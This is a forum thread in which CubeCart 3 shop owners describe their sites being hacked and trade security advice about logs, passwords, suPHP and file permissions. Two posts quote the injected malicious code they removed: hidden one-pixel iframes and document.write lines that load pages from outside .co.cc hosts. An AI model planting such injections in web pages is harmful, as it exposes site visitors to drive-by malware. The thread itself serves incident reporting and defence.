CC3 site just hacked

[Guest goldentongs]

hello

this is just a message to cubecart and anyone running CC3

my site has 3.0.20 installed with various mods and SSL

my site is hosted alone with nothing else installed apart from cubecart

whilst working on site today, firefox/google flagged my site as an attack site

when i looked at files i found the following in index.php

<iframe src="http://bastionnet.co.cc/QQkFBg0AAQ0MBA0DEkcJBQY

NAQQAAAYHBA==" width="1" height="1" frameborder="0">

it was located at very end of file

i have since deleted it and put a review request with google

if anyone has any tips to better secure site (file permissions etc.)

please let me know your recommendations

[bsmither]

I believe it's been said (several times), a forensic examination of your server logs, ftp logs, etc would help. (Oops, sorry, I thought you had been here a long time.)

At the time you began working on your site, did you have any other browser windows open? Some sort of password stealing or session hijacking vulnerability from another site that was open on your desktop?

[Guest goldentongs]

I believe it's been said (several times), a forensic examination of your server logs, ftp logs, etc would help. (Oops, sorry, I thought you had been here a long time.)

At the time you began working on your site, did you have any other browser windows open? Some sort of password stealing or session hijacking vulnerability from another site that was open on your desktop?

if i knew they were needed and where to obtain logs from i would have posted them

i have used cubecart for 2 years without a problem

i had another browser open but that only displayed the same website

i had other tabs open in the same browser i was using

the other tabs were my Cpanel, wikipedia and google pages

i will get logs and post them

once i work out how to get them as my host has locked the log programs

and only one gives me an archive file that cannot be opened

and when clicking webalizer ftp, it says no file found

also computer is clean, very new win 7 install, regular scans, and only used for one purpose (work for 1 website)

not used for general browsing etc. and only connected to net when work is being done

[havenswift-hosting]

I believe it's been said (several times), a forensic examination of your server logs, ftp logs, etc would help. (Oops, sorry, I thought you had been here a long time.)

At the time you began working on your site, did you have any other browser windows open? Some sort of password stealing or session hijacking vulnerability from another site that was open on your desktop?

if i knew they were needed and where to obtain logs from i would have posted them

i have used cubecart for 2 years without a problem

i had another browser open but that only displayed the same website

i had other tabs open in the same browser i was using

the other tabs were my Cpanel, wikipedia and google pages

i will get logs and post them

once i work out how to get them as my host has locked the log programs

and only one gives me an archive file that cannot be opened

and when clicking webalizer ftp, it says no file found

also computer is clean, very new win 7 install, regular scans, and only used for one purpose (work for 1 website)

not used for general browsing etc. and only connected to net when work is being done

Your hosting company should be able to help you identify where the problem came from but support for this type of problem can be lacking at many hosting companies !

The most likely sources of the problem is somebody knowing your ftp password either through brute force hacking if it is too easy or by you somehow disclosing it. However the security generally on the server could be poor and if either you or any other account (if they arent running suPHP) has lax permissions on files or directories then the problem could have come in from another account.

You can analyse some of the log files and/or ask your hosting company to do it for you and if they arent willing to help then maybe look for another hosting company - unless the root cause is identified it will happen again as most of these types of hacks are automated

Good luck

Ian

[Guest goldentongs]

I believe it's been said (several times), a forensic examination of your server logs, ftp logs, etc would help. (Oops, sorry, I thought you had been here a long time.)

At the time you began working on your site, did you have any other browser windows open? Some sort of password stealing or session hijacking vulnerability from another site that was open on your desktop?

if i knew they were needed and where to obtain logs from i would have posted them

i have used cubecart for 2 years without a problem

i had another browser open but that only displayed the same website

i had other tabs open in the same browser i was using

the other tabs were my Cpanel, wikipedia and google pages

i will get logs and post them

once i work out how to get them as my host has locked the log programs

and only one gives me an archive file that cannot be opened

and when clicking webalizer ftp, it says no file found

also computer is clean, very new win 7 install, regular scans, and only used for one purpose (work for 1 website)

not used for general browsing etc. and only connected to net when work is being done

Your hosting company should be able to help you identify where the problem came from but support for this type of problem can be lacking at many hosting companies !

The most likely sources of the problem is somebody knowing your ftp password either through brute force hacking if it is too easy or by you somehow disclosing it. However the security generally on the server could be poor and if either you or any other account (if they arent running suPHP) has lax permissions on files or directories then the problem could have come in from another account.

You can analyse some of the log files and/or ask your hosting company to do it for you and if they arent willing to help then maybe look for another hosting company - unless the root cause is identified it will happen again as most of these types of hacks are automated

Good luck

Ian

thanks for the advice, i will contact my host as their support is pretty good (changing host is not an option)

i also have a dedicated ip,

i know 100% nobody else knows the passwords associated with the site

and the password is pretty secure (long password with Upper and lower case letters, numbers and symbols)

how do i get the logs as in Cpanel i am having no joy

i have not set any programs to log anything as site i am working on is new

any advice

thanks in advance

[bsmither]

I honestly thought you had hands-on access to your own server. Sorry for the misunderstanding.

It is my 'opinion' that having a dedicated IP (necessary for a distinct SSL certificate) does not mean your site sits alone on a server box. (But I could wrong about that.) It may be in a virtual server, or some other server box configuration, but ultimately reachable through the filesystem via another site's vulnerabilities.

[havenswift-hosting]

I honestly thought you had hands-on access to your own server. Sorry for the misunderstanding.

It is my 'opinion' that having a dedicated IP (necessary for a distinct SSL certificate) does not mean your site sits alone on a server box. (But I could wrong about that.) It may be in a virtual server, or some other server box configuration, but ultimately reachable through the filesystem via another site's vulnerabilities.

That is exactly right - having a dedicated IP address does not mean a dedicated server so could certainly have been accessed through another account on the server of which there will be hundreds, if not thousands. It is also possible that if you have installed quite a few mods that one of those has a vulnerability.

Nobody will be able to give any further help though until you have heard back from your hosting company about how those files were uploaded

[Leo Clark]

Same thing happened to me after 4 years using CC3:

Only on a different file: jslibrary.js

document.write("<iframe src='http://osufoyysdf.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAQMHBgINBQ==' width='1' height='1' frameborder='0'></iframe>");

document.write("<iframe src='http://dedede4.co.cc/notfound/inkujrgzk.php?n=setup2432' width='1' height='1' frameborder='0'></iframe>");

I restored the original file and Avast is calm now.

Anything I should do? Does it help to change permissions to 7777? And is it ok to to that?

Thanks so much!!

Leo

[havenswift-hosting]

Same thing happened to me after 4 years using CC3:

Only on a different file: jslibrary.js

I restored the original file and Avast is calm now.

Anything I should do? Does it help to change permissions to 7777? And is it ok to to that?

Thanks so much!!

Leo

No you certainly shouldnt change the permissions on that or any other file that doesnt need it to 777 - that can be a huge security risk. You are much better off finding a hosting company that runs suPHP on their hosting server which doesnt require 777 on ANY file, as that is much more secure

Ian

[Leo Clark]

Same thing happened to me after 4 years using CC3:

Only on a different file: jslibrary.js

I restored the original file and Avast is calm now.

Anything I should do? Does it help to change permissions to 7777? And is it ok to to that?

Thanks so much!!

Leo

No you certainly shouldnt change the permissions on that or any other file that doesnt need it to 777 - that can be a huge security risk. You are much better off finding a hosting company that runs suPHP on their hosting server which doesnt require 777 on ANY file, as that is much more secure

Ian

Thanks a lot Ian!!

I do not know where I had my thoughts when I came up with this

I wanted to do the exact opposite thing!

Cheers!

[Guest Shipz]

Hey guys

I have been watching this thread as i have been a victim of this a few days ago.

I hadn't noticed any problems with my site until a couple of days and the page layout had changed slightly, plus a friend let me know my site was making their browser throw a red screen with a message saying i had been highlighted as a malicious site. Which is not good, plus it proved my virus software was rubbish as mine never popped anything up.

I found code very close to what as been displayed here in the index.php file. I removed this and reloaded the page and the layout was back to normal but then i noticed it was still trying to access the web addresses listed in the code. It was only flashing up momnetarily on the bottom bar. So i tried to access my jslibrary.js file but i couldnt get into it. I got a web hosting script warning. How do you get to this file if you want to edit it? So i was at a bit of a loss so contacted my host and they offered to restore my site to a backup a few days back. I agreed and they did it but when i looked it was still doing the same thing.

Another e-mail to my host and they offered to do another restore but to a date a week or so back to a backup that i had made. Fingers crossed this seems to have got it back working. I have now changed my password to my host, ftp and cubecart admin altered my permissions on the image/uploads folder to 755 and customer image uploads folder to 755.When i have to add images in the admin will i need to change these permissions back to 777?

I was just wondering if this will be enough to keep them out or is there more i can do to try and prevent this. At the moment i am just starting out and although it's been a hinderence it would have been more so if i was really busy.

Just thought i'd add to this thread and say how glad i am that i made a backup and if it helps someone else then that's good.

Dave